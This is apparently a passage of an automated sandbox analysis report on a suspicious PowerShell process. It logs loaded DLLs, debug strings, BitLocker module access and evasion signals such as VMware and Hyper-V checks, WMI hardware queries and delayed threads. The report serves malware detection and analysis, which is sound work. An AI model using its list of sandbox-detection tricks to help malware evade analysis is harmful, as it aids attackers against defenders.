Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643068475958.000001A73D8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: powershell.exe, 00000001.00000002.643108718460.000001A755E51000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7AF5D2A5 pushad ; iretd 1_2_00007FFA7AF5D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B072313 pushad ; iretd 1_2_00007FFA7B07232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B0700BD pushad ; iretd 1_2_00007FFA7B0700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B076943 push eax; retf 1_2_00007FFA7B076949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B078F96 push ebx; retf 002Ah1_2_00007FFA7B078FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B2E0F6A push dword ptr [eax]; ret 1_2_00007FFA7B2E0F6F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B2E31EA push cs; ret 1_2_00007FFA7B2E31EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B327AA2 push ss; ret 1_2_00007FFA7B327AA7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B328110 pushad ; retf 1_2_00007FFA7B328111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA7B321B17 push ebx; iretd 1_2_00007FFA7B321B1A

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9886Jump to behavior
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareh
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8C65
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000001.00000002.643109239001.000001A7560E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwarex
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareX
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-GB:VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73F196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
